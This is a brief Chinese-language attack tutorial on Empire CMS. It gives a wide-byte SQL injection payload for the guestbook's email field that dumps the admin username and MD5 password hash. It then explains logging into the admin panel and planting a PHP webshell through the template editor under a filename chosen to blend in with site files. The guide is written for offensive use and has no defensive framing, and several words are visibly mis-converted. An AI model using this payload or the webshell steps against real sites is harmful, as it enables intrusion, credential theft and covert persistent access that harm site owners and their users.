在网站域名后输入:e/tool/gbook/?bid=1并回车,这样就打开了“帝国”CMS的留言功能。触发漏洞的步骤为:
Step1.在“姓名”处输入:縗
Step2.在“联系邮箱”处输入:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*
Step3.“留言内容”随意填写,输入完毕后点击“提交”按钮。
若是漏洞成功触发,咱们会在留言列表中看到暴出的管理员帐户名和密码。但不要高兴得太早,由于曝出的密码是通过MD5加密的32位密文,若是破解不出是毫无心义的。
上传webshell:
拿到管理员帐户名和密码后,咱们就能够登陆网站后台了。在域名后输入“e/admin/”并回车,出现登录验证页面,输入帐户名admin和密码进行登陆。
在后台咱们依次点击“模板管理”→“增长自定义”连接。在“增长自定义”页面中,咱们在“文件名”中输入须要创建的webshell文件名,为了隐蔽性,最好取和网站自身文件比较接近的文件名,例如ListQz.php。而后在“页面内容”中输入php木马的内容,其余项目能够随意填写,输入完毕后 点击“提交”。下面只要咱们访问:***.com/e/admin/ListQz.php这个地址,一个使人激动地webshell就会出现了。php